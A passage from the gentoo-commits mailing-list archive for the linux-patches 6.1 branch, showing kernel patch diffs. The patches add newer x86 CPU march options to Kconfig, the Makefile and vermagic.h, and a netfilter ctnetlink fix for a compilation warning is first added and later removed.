-+	depends on (MWINCHIP3D || MCRUSOE || MEFFICEON || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || MK8 || MVIAC3_2 || MVIAC7 || MGEODEGX1 || MGEODE_LX || MCORE2 || MATOM || MK8SSE3 || MK10 || MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MNATIVE_INTEL || MNATIVE_AMD) || X86_64
- 
++	depends on (MWINCHIP3D || MCRUSOE || MEFFICEON || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM \
++	|| MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || MK8 || MVIAC3_2 || MVIAC7 || MGEODEGX1 \
++	|| MGEODE_LX || MCORE2 || MATOM || MK8SSE3 || MK10 || MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER \
++	|| MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MZEN4 || MNEHALEM \
++	|| MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL \
++	|| MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE \
++	|| MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL \
++	|| MNATIVE_AMD) || X86_64
+
  config X86_CMPXCHG64
  	def_bool y
 -	depends on X86_PAE || X86_64 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586TSC || M586MMX || MATOM || MGEODE_LX || MGEODEGX1 || MK6 || MK7 || MK8
-+	depends on X86_PAE || X86_64 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586TSC || M586MMX || MATOM || MGEODE_LX || MGEODEGX1 || MK6 || MK7 || MK8 || MK8SSE3 || MK10 || MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MNATIVE_INTEL || MNATIVE_AMD
- 
++	depends on X86_PAE || X86_64 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 \
++	|| M586TSC || M586MMX || MATOM || MGEODE_LX || MGEODEGX1 || MK6 || MK7 || MK8 || MK8SSE3 || MK10 \
++	|| MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN \
++	|| MZEN2 || MZEN3 || MZEN4 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS \
++	|| MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE \
++	|| MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE \
++	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL || MNATIVE_AMD
+
  # this should be set for all -march=.. options where the compiler
  # generates cmov.
  config X86_CMOV
  	def_bool y
 -	depends on (MK8 || MK7 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MCRUSOE || MEFFICEON || X86_64 || MATOM || MGEODE_LX)
-+	depends on (MK8 || MK7 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MCRUSOE || MEFFICEON || X86_64 || MATOM || MGEODE_LX || MK8SSE3 || MK10 || MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MNATIVE_INTEL || MNATIVE_AMD)
- 
++	depends on (MK8 || MK7 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 \
++	|| MVIAC3_2 || MVIAC7 || MCRUSOE || MEFFICEON || X86_64 || MATOM || MGEODE_LX || MK8SSE3 || MK10 \
++	|| MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR \
++	|| MZEN || MZEN2 || MZEN3 || MZEN4 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT \
++	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX \
++	|| MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS \
++	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL || MNATIVE_AMD)
+
  config X86_MINIMUM_CPU_FAMILY
  	int
  	default "64" if X86_64
 -	default "6" if X86_32 && (MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MEFFICEON || MATOM || MCRUSOE || MCORE2 || MK7 || MK8)
-+	default "6" if X86_32 && (MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MEFFICEON || MATOM || MCRUSOE || MCORE2 || MK7 || MK8 ||  MK8SSE3 || MK10 || MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MNATIVE_INTEL || MNATIVE_AMD)
++	default "6" if X86_32 && (MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 \
++	|| MVIAC3_2 || MVIAC7 || MEFFICEON || MATOM || MCRUSOE || MCORE2 || MK7 || MK8 ||  MK8SSE3 \
++	|| MK10 || MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER \
++	|| MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MZEN4 || MNEHALEM || MWESTMERE || MSILVERMONT \
++	|| MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL \
++	|| MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE \
++	|| MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MRAPTORLAKE \
++	|| MNATIVE_INTEL || MNATIVE_AMD)
  	default "5" if X86_32 && X86_CMPXCHG64
  	default "4"
- 
+
+ config X86_DEBUGCTLMSR
+ 	def_bool y
+-	depends on !(MK6 || MWINCHIPC6 || MWINCHIP3D || MCYRIXIII || M586MMX || M586TSC || M586 || M486SX || M486) && !UML
++	depends on !(MK6 || MWINCHIPC6 || MWINCHIP3D || MCYRIXIII || M586MMX || M586TSC || M586 \
++	|| M486SX || M486) && !UML
+
+ config IA32_FEAT_CTL
+ 	def_bool y
 diff --git a/arch/x86/Makefile b/arch/x86/Makefile
-index e84cdd409b64..7d3bbf060079 100644
+index bafbd905e6e7..7fae52788560 100644
 --- a/arch/x86/Makefile
 +++ b/arch/x86/Makefile
-@@ -131,8 +131,44 @@ else
+@@ -150,8 +150,47 @@ else
          # FIXME - should be integrated in Makefile.cpu (Makefile_32.cpu)
          cflags-$(CONFIG_MK8)		+= -march=k8
          cflags-$(CONFIG_MPSC)		+= -march=nocona
@@ -557,6 +650,7 @@ index e84cdd409b64..7d3bbf060079 100644
 +        cflags-$(CONFIG_MZEN) 		+= -march=znver1
 +        cflags-$(CONFIG_MZEN2) 	+= -march=znver2
 +        cflags-$(CONFIG_MZEN3) 	+= -march=znver3
++        cflags-$(CONFIG_MZEN4) 	+= -march=znver4
 +        cflags-$(CONFIG_MNATIVE_INTEL) += -march=native
 +        cflags-$(CONFIG_MNATIVE_AMD) 	+= -march=native
 +        cflags-$(CONFIG_MATOM) 	+= -march=bonnell
@@ -580,17 +674,19 @@ index e84cdd409b64..7d3bbf060079 100644
 +        cflags-$(CONFIG_MSAPPHIRERAPIDS) += -march=sapphirerapids
 +        cflags-$(CONFIG_MROCKETLAKE) 	+= -march=rocketlake
 +        cflags-$(CONFIG_MALDERLAKE) 	+= -march=alderlake
++        cflags-$(CONFIG_MRAPTORLAKE) 	+= -march=raptorlake
++        cflags-$(CONFIG_MMETEORLAKE) 	+= -march=meteorlake
 +        cflags-$(CONFIG_GENERIC_CPU2) 	+= -march=x86-64-v2
 +        cflags-$(CONFIG_GENERIC_CPU3) 	+= -march=x86-64-v3
 +        cflags-$(CONFIG_GENERIC_CPU4) 	+= -march=x86-64-v4
          cflags-$(CONFIG_GENERIC_CPU)	+= -mtune=generic
          KBUILD_CFLAGS += $(cflags-y)
- 
+
 diff --git a/arch/x86/include/asm/vermagic.h b/arch/x86/include/asm/vermagic.h
-index 75884d2cdec3..4e6a08d4c7e5 100644
+index 75884d2cdec3..18021e8c0c28 100644
 --- a/arch/x86/include/asm/vermagic.h
 +++ b/arch/x86/include/asm/vermagic.h
-@@ -17,6 +17,48 @@
+@@ -17,6 +17,52 @@
  #define MODULE_PROC_FAMILY "586MMX "
  #elif defined CONFIG_MCORE2
  #define MODULE_PROC_FAMILY "CORE2 "
@@ -636,10 +732,14 @@ index 75884d2cdec3..4e6a08d4c7e5 100644
 +#define MODULE_PROC_FAMILY "ROCKETLAKE "
 +#elif defined CONFIG_MALDERLAKE
 +#define MODULE_PROC_FAMILY "ALDERLAKE "
++#elif defined CONFIG_MRAPTORLAKE
++#define MODULE_PROC_FAMILY "RAPTORLAKE "
++#elif defined CONFIG_MMETEORLAKE
++#define MODULE_PROC_FAMILY "METEORLAKE "
  #elif defined CONFIG_MATOM
  #define MODULE_PROC_FAMILY "ATOM "
  #elif defined CONFIG_M686
-@@ -35,6 +77,30 @@
+@@ -35,6 +81,32 @@
  #define MODULE_PROC_FAMILY "K7 "
  #elif defined CONFIG_MK8
  #define MODULE_PROC_FAMILY "K8 "
@@ -667,9 +767,10 @@ index 75884d2cdec3..4e6a08d4c7e5 100644
 +#define MODULE_PROC_FAMILY "ZEN2 "
 +#elif defined CONFIG_MZEN3
 +#define MODULE_PROC_FAMILY "ZEN3 "
++#elif defined CONFIG_MZEN4
++#define MODULE_PROC_FAMILY "ZEN4 "
  #elif defined CONFIG_MELAN
  #define MODULE_PROC_FAMILY "ELAN "
  #elif defined CONFIG_MCRUSOE
--- 
-2.35.1
-
+--
+2.38.1


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2022-12-11 23:32 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2022-12-11 23:32 UTC (permalink / raw
  To: gentoo-commits

commit:     b3e9a3f6269e7e72eb6a51ca19dc85e2201fb843
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Dec 11 23:32:12 2022 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Dec 11 23:32:12 2022 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=b3e9a3f6

Remove redundant patch

Removed:
2010_netfilter-ctnetlink-compilation-fix.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                    |  4 --
 2010_netfilter-ctnetlink-compilation-fix.patch | 90 --------------------------
 2 files changed, 94 deletions(-)

diff --git a/0000_README b/0000_README
index 528708c1..5e68531e 100644
--- a/0000_README
+++ b/0000_README
@@ -59,10 +59,6 @@ Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758
 
-Patch:  2010_netfilter-ctnetlink-compilation-fix.patch
-From:   https://git.kernel.org/pub/scm/linux/kernel/git/netfilter/nf.git
-Desc:   netfilter: ctnetlink: fix compilation warning after data race fixes in ct mark
-
 Patch:  2900_tmp513-Fix-build-issue-by-selecting-CONFIG_REG.patch
 From:   https://bugs.gentoo.org/710790
 Desc:   tmp513 requies REGMAP_I2C to build.  Select it by default in Kconfig. See bug #710790. Thanks to Phil Stracchino

diff --git a/2010_netfilter-ctnetlink-compilation-fix.patch b/2010_netfilter-ctnetlink-compilation-fix.patch
deleted file mode 100644
index b7bd4dee..00000000
--- a/2010_netfilter-ctnetlink-compilation-fix.patch
+++ /dev/null
@@ -1,90 +0,0 @@
-From 1feeae071507ad65cf9f462a1bdd543a4bf89e71 Mon Sep 17 00:00:00 2001
-From: Pablo Neira Ayuso <pablo@netfilter.org>
-Date: Mon, 28 Nov 2022 10:58:53 +0100
-Subject: netfilter: ctnetlink: fix compilation warning after data race fixes
- in ct mark
-
-All warnings (new ones prefixed by >>):
-
-   net/netfilter/nf_conntrack_netlink.c: In function '__ctnetlink_glue_build':
->> net/netfilter/nf_conntrack_netlink.c:2674:13: warning: unused variable 'mark' [-Wunused-variable]
-    2674 |         u32 mark;
-         |             ^~~~
-
-Fixes: 52d1aa8b8249 ("netfilter: conntrack: Fix data-races around ct mark")
-Reported-by: kernel test robot <lkp@intel.com>
-Tested-by: Ivan Babrou <ivan@ivan.computer>
-Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
----
- net/netfilter/nf_conntrack_netlink.c | 19 ++++++++++---------
- 1 file changed, 10 insertions(+), 9 deletions(-)
-
-diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
-index d71150a40fb08..1286ae7d46096 100644
---- a/net/netfilter/nf_conntrack_netlink.c
-+++ b/net/netfilter/nf_conntrack_netlink.c
-@@ -328,8 +328,13 @@ nla_put_failure:
- }
- 
- #ifdef CONFIG_NF_CONNTRACK_MARK
--static int ctnetlink_dump_mark(struct sk_buff *skb, u32 mark)
-+static int ctnetlink_dump_mark(struct sk_buff *skb, const struct nf_conn *ct)
- {
-+	u32 mark = READ_ONCE(ct->mark);
-+
-+	if (!mark)
-+		return 0;
-+
- 	if (nla_put_be32(skb, CTA_MARK, htonl(mark)))
- 		goto nla_put_failure;
- 	return 0;
-@@ -543,7 +548,7 @@ static int ctnetlink_dump_extinfo(struct sk_buff *skb,
- static int ctnetlink_dump_info(struct sk_buff *skb, struct nf_conn *ct)
- {
- 	if (ctnetlink_dump_status(skb, ct) < 0 ||
--	    ctnetlink_dump_mark(skb, READ_ONCE(ct->mark)) < 0 ||
-+	    ctnetlink_dump_mark(skb, ct) < 0 ||
- 	    ctnetlink_dump_secctx(skb, ct) < 0 ||
- 	    ctnetlink_dump_id(skb, ct) < 0 ||
- 	    ctnetlink_dump_use(skb, ct) < 0 ||
-@@ -722,7 +727,6 @@ ctnetlink_conntrack_event(unsigned int events, const struct nf_ct_event *item)
- 	struct sk_buff *skb;
- 	unsigned int type;
- 	unsigned int flags = 0, group;
--	u32 mark;
- 	int err;
- 
- 	if (events & (1 << IPCT_DESTROY)) {
-@@ -827,9 +831,8 @@ ctnetlink_conntrack_event(unsigned int events, const struct nf_ct_event *item)
- 	}
- 
- #ifdef CONFIG_NF_CONNTRACK_MARK
--	mark = READ_ONCE(ct->mark);
--	if ((events & (1 << IPCT_MARK) || mark) &&
--	    ctnetlink_dump_mark(skb, mark) < 0)
-+	if (events & (1 << IPCT_MARK) &&
-+	    ctnetlink_dump_mark(skb, ct) < 0)
- 		goto nla_put_failure;
- #endif
- 	nlmsg_end(skb, nlh);
-@@ -2671,7 +2674,6 @@ static int __ctnetlink_glue_build(struct sk_buff *skb, struct nf_conn *ct)
- {
- 	const struct nf_conntrack_zone *zone;
- 	struct nlattr *nest_parms;
--	u32 mark;
- 
- 	zone = nf_ct_zone(ct);
- 
-@@ -2733,8 +2735,7 @@ static int __ctnetlink_glue_build(struct sk_buff *skb, struct nf_conn *ct)
- 		goto nla_put_failure;
- 
- #ifdef CONFIG_NF_CONNTRACK_MARK
--	mark = READ_ONCE(ct->mark);
--	if (mark && ctnetlink_dump_mark(skb, mark) < 0)
-+	if (ctnetlink_dump_mark(skb, ct) < 0)
- 		goto nla_put_failure;
- #endif
- 	if (ctnetlink_dump_labels(skb, ct) < 0)
--- 
-cgit 
-


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2022-12-11 14:28 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2022-12-11 14:28 UTC (permalink / raw
  To: gentoo-commits

commit:     2009fbd52bfcd103d36a829e6d8f6ded19de3fdf
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Dec 11 14:28:34 2022 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Dec 11 14:28:34 2022 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2009fbd5

netfilter: ctnetlink fix compl. warning after data race fixes in ct mark

Bug: https://bugs.gentoo.org/884585

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                    |  4 ++
 2010_netfilter-ctnetlink-compilation-fix.patch | 90 ++++++++++++++++++++++++++
 2 files changed, 94 insertions(+)

diff --git a/0000_README b/0000_README
index 5e68531e..528708c1 100644
--- a/0000_README
+++ b/0000_README
@@ -59,6 +59,10 @@ Patch:  2000_BT-Check-key-sizes-only-if-Secure-Simple-Pairing-enabled.patch
 From:   https://lore.kernel.org/linux-bluetooth/20190522070540.48895-1-marcel@holtmann.org/raw
 Desc:   Bluetooth: Check key sizes only when Secure Simple Pairing is enabled. See bug #686758
 
+Patch:  2010_netfilter-ctnetlink-compilation-fix.patch
+From:   https://git.kernel.org/pub/scm/linux/kernel/git/netfilter/nf.git
+Desc:   netfilter: ctnetlink: fix compilation warning after data race fixes in ct mark
+
 Patch:  2900_tmp513-Fix-build-issue-by-selecting-CONFIG_REG.patch
 From:   https://bugs.gentoo.org/710790
 Desc:   tmp513 requies REGMAP_I2C to build.  Select it by default in Kconfig. See bug #710790. Thanks to Phil Stracchino

diff --git a/2010_netfilter-ctnetlink-compilation-fix.patch b/2010_netfilter-ctnetlink-compilation-fix.patch
new file mode 100644
index 00000000..b7bd4dee
--- /dev/null
+++ b/2010_netfilter-ctnetlink-compilation-fix.patch
@@ -0,0 +1,90 @@
+From 1feeae071507ad65cf9f462a1bdd543a4bf89e71 Mon Sep 17 00:00:00 2001
+From: Pablo Neira Ayuso <pablo@netfilter.org>
+Date: Mon, 28 Nov 2022 10:58:53 +0100
+Subject: netfilter: ctnetlink: fix compilation warning after data race fixes
+ in ct mark
+
+All warnings (new ones prefixed by >>):
+
+   net/netfilter/nf_conntrack_netlink.c: In function '__ctnetlink_glue_build':
+>> net/netfilter/nf_conntrack_netlink.c:2674:13: warning: unused variable 'mark' [-Wunused-variable]
+    2674 |         u32 mark;
+         |             ^~~~
+
+Fixes: 52d1aa8b8249 ("netfilter: conntrack: Fix data-races around ct mark")
+Reported-by: kernel test robot <lkp@intel.com>
+Tested-by: Ivan Babrou <ivan@ivan.computer>
+Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
+---
+ net/netfilter/nf_conntrack_netlink.c | 19 ++++++++++---------
+ 1 file changed, 10 insertions(+), 9 deletions(-)
+
+diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
+index d71150a40fb08..1286ae7d46096 100644
+--- a/net/netfilter/nf_conntrack_netlink.c
++++ b/net/netfilter/nf_conntrack_netlink.c
+@@ -328,8 +328,13 @@ nla_put_failure:
+ }
+ 
+ #ifdef CONFIG_NF_CONNTRACK_MARK
+-static int ctnetlink_dump_mark(struct sk_buff *skb, u32 mark)
++static int ctnetlink_dump_mark(struct sk_buff *skb, const struct nf_conn *ct)
+ {
++	u32 mark = READ_ONCE(ct->mark);
++
++	if (!mark)
++		return 0;
++
+ 	if (nla_put_be32(skb, CTA_MARK, htonl(mark)))
+ 		goto nla_put_failure;
+ 	return 0;
+@@ -543,7 +548,7 @@ static int ctnetlink_dump_extinfo(struct sk_buff *skb,
+ static int ctnetlink_dump_info(struct sk_buff *skb, struct nf_conn *ct)
+ {
+ 	if (ctnetlink_dump_status(skb, ct) < 0 ||
+-	    ctnetlink_dump_mark(skb, READ_ONCE(ct->mark)) < 0 ||
++	    ctnetlink_dump_mark(skb, ct) < 0 ||
+ 	    ctnetlink_dump_secctx(skb, ct) < 0 ||
+ 	    ctnetlink_dump_id(skb, ct) < 0 ||
+ 	    ctnetlink_dump_use(skb, ct) < 0 ||
+@@ -722,7 +727,6 @@ ctnetlink_conntrack_event(unsigned int events, const struct nf_ct_event *item)
+ 	struct sk_buff *skb;
+ 	unsigned int type;
+ 	unsigned int flags = 0, group;
+-	u32 mark;
+ 	int err;
+ 
+ 	if (events & (1 << IPCT_DESTROY)) {
+@@ -827,9 +831,8 @@ ctnetlink_conntrack_event(unsigned int events, const struct nf_ct_event *item)
+ 	}
+ 
+ #ifdef CONFIG_NF_CONNTRACK_MARK
+-	mark = READ_ONCE(ct->mark);
+-	if ((events & (1 << IPCT_MARK) || mark) &&
+-	    ctnetlink_dump_mark(skb, mark) < 0)
++	if (events & (1 << IPCT_MARK) &&
++	    ctnetlink_dump_mark(skb, ct) < 0)
+ 		goto nla_put_failure;
+ #endif
+ 	nlmsg_end(skb, nlh);
+@@ -2671,7 +2674,6 @@ static int __ctnetlink_glue_build(struct sk_buff *skb, struct nf_conn *ct)
+ {
+ 	const struct nf_conntrack_zone *zone;
+ 	struct nlattr *nest_parms;
+-	u32 mark;
+ 
+ 	zone = nf_ct_zone(ct);
+ 
+@@ -2733,8 +2735,7 @@ static int __ctnetlink_glue_build(struct sk_buff *skb, struct nf_conn *ct)
+ 		goto nla_put_failure;
+ 
+ #ifdef CONFIG_NF_CONNTRACK_MARK
+-	mark = READ_ONCE(ct->mark);
+-	if (mark && ctnetlink_dump_mark(skb, mark) < 0)
++	if (ctnetlink_dump_mark(skb, ct) < 0)
+ 		goto nla_put_failure;
+ #endif
+ 	if (ctnetlink_dump_labels(skb, ct) < 0)
+-- 
+cgit 
+


^ permalink raw reply related	[flat|nested] 161+ messages in thread

end of thread, other threads:[~2024-09-30 16:04 UTC | newest]

Thread overview: 161+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2023-12-03 11:16 [gentoo-commits] proj/linux-patches:6.1 commit in: / Mike Pagano
  -- strict thread matches above, loose matches on Subject: below --
2024-09-30 16:04 Mike Pagano
2024-09-18 18:04 Mike Pagano
2024-09-12 12:35 Mike Pagano
2024-09-08 11:06 Mike Pagano
2024-09-04 13:52 Mike Pagano
2024-08-29 16:49 Mike Pagano
2024-08-19 10:43 Mike Pagano
2024-08-14 15:06 Mike Pagano
2024-08-14 14:11 Mike Pagano
2024-08-11 13:32 Mike Pagano
2024-08-11 13:29 Mike Pagano
2024-08-10 15:45 Mike Pagano
2024-08-03 15:28 Mike Pagano
2024-07-27 13:47 Mike Pagano
2024-07-25 12:15 Mike Pagano
2024-07-25 12:09 Mike Pagano
2024-07-18 12:15 Mike Pagano
2024-07-15 11:16 Mike Pagano
2024-07-11 11:49 Mike Pagano
2024-07-05 11:07 Mike Pagano
2024-06-27 13:10 Mike Pagano
2024-06-27 12:33 Mike Pagano
2024-06-21 14:07 Mike Pagano
2024-06-16 14:33 Mike Pagano
2024-06-12 10:16 Mike Pagano
2024-05-25 15:16 Mike Pagano
2024-05-17 11:36 Mike Pagano
2024-05-05 18:10 Mike Pagano
2024-05-02 15:01 Mike Pagano
2024-04-29 11:30 Mike Pagano
2024-04-29 11:27 Mike Pagano
2024-04-27 22:45 Mike Pagano
2024-04-27 17:06 Mike Pagano
2024-04-18  3:05 Alice Ferrazzi
2024-04-13 13:07 Mike Pagano
2024-04-10 15:10 Mike Pagano
2024-04-03 13:54 Mike Pagano
2024-03-27 11:24 Mike Pagano
2024-03-15 22:00 Mike Pagano
2024-03-06 18:07 Mike Pagano
2024-03-01 13:07 Mike Pagano
2024-02-23 13:19 Mike Pagano
2024-02-23 12:37 Mike Pagano
2024-02-16 19:00 Mike Pagano
2024-02-05 21:01 Mike Pagano
2024-02-01  1:23 Mike Pagano
2024-01-26  0:09 Mike Pagano
2024-01-20 11:45 Mike Pagano
2024-01-15 18:47 Mike Pagano
2024-01-10 17:16 Mike Pagano
2024-01-05 14:54 Mike Pagano
2024-01-05 14:50 Mike Pagano
2024-01-04 16:10 Mike Pagano
2024-01-01 13:46 Mike Pagano
2023-12-20 16:56 Mike Pagano
2023-12-13 18:27 Mike Pagano
2023-12-11 14:20 Mike Pagano
2023-12-08 10:55 Mike Pagano
2023-12-01 10:36 Mike Pagano
2023-11-28 17:51 Mike Pagano
2023-11-20 11:23 Mike Pagano
2023-11-08 14:02 Mike Pagano
2023-11-02 11:10 Mike Pagano
2023-10-25 11:36 Mike Pagano
2023-10-22 22:53 Mike Pagano
2023-10-19 22:30 Mike Pagano
2023-10-18 20:04 Mike Pagano
2023-10-15 17:40 Mike Pagano
2023-10-10 22:56 Mike Pagano
2023-10-06 13:18 Mike Pagano
2023-10-05 14:23 Mike Pagano
2023-09-23 11:03 Mike Pagano
2023-09-23 10:16 Mike Pagano
2023-09-19 13:20 Mike Pagano
2023-09-15 18:04 Mike Pagano
2023-09-13 11:19 Mike Pagano
2023-09-13 11:05 Mike Pagano
2023-09-06 22:16 Mike Pagano
2023-09-02  9:56 Mike Pagano
2023-08-30 14:42 Mike Pagano
2023-08-27 21:41 Mike Pagano
2023-08-26 15:19 Mike Pagano
2023-08-26 15:00 Mike Pagano
2023-08-23 18:08 Mike Pagano
2023-08-16 18:32 Mike Pagano
2023-08-16 18:32 Mike Pagano
2023-08-11 11:55 Mike Pagano
2023-08-08 18:40 Mike Pagano
2023-08-03 11:54 Mike Pagano
2023-08-03 11:48 Mike Pagano
2023-07-27 11:48 Mike Pagano
2023-07-24 20:27 Mike Pagano
2023-07-23 15:14 Mike Pagano
2023-07-19 17:05 Mike Pagano
2023-07-05 20:34 Mike Pagano
2023-07-05 20:28 Mike Pagano
2023-07-04 13:15 Mike Pagano
2023-07-01 18:27 Mike Pagano
2023-06-28 10:26 Mike Pagano
2023-06-21 14:54 Alice Ferrazzi
2023-06-14 10:17 Mike Pagano
2023-06-09 12:02 Mike Pagano
2023-06-09 11:29 Mike Pagano
2023-06-05 11:48 Mike Pagano
2023-06-02 15:07 Mike Pagano
2023-05-30 16:51 Mike Pagano
2023-05-24 17:05 Mike Pagano
2023-05-17 10:57 Mike Pagano
2023-05-11 16:08 Mike Pagano
2023-05-11 14:49 Mike Pagano
2023-05-10 17:54 Mike Pagano
2023-05-10 16:18 Mike Pagano
2023-04-30 23:50 Alice Ferrazzi
2023-04-26 13:19 Mike Pagano
2023-04-20 11:16 Alice Ferrazzi
2023-04-13 16:09 Mike Pagano
2023-04-06 10:41 Alice Ferrazzi
2023-03-30 20:52 Mike Pagano
2023-03-30 11:21 Alice Ferrazzi
2023-03-22 14:15 Alice Ferrazzi
2023-03-21 13:32 Mike Pagano
2023-03-17 10:43 Mike Pagano
2023-03-13 11:30 Alice Ferrazzi
2023-03-11 14:09 Mike Pagano
2023-03-11 11:19 Mike Pagano
2023-03-10 12:57 Mike Pagano
2023-03-10 12:47 Mike Pagano
2023-03-06 17:30 Mike Pagano
2023-03-03 13:01 Mike Pagano
2023-03-03 12:28 Mike Pagano
2023-02-27 16:59 Mike Pagano
2023-02-26 18:24 Mike Pagano
2023-02-26 18:16 Mike Pagano
2023-02-25 11:02 Alice Ferrazzi
2023-02-24  3:03 Alice Ferrazzi
2023-02-22 13:46 Alice Ferrazzi
2023-02-14 18:35 Mike Pagano
2023-02-13 13:38 Mike Pagano
2023-02-09 12:52 Mike Pagano
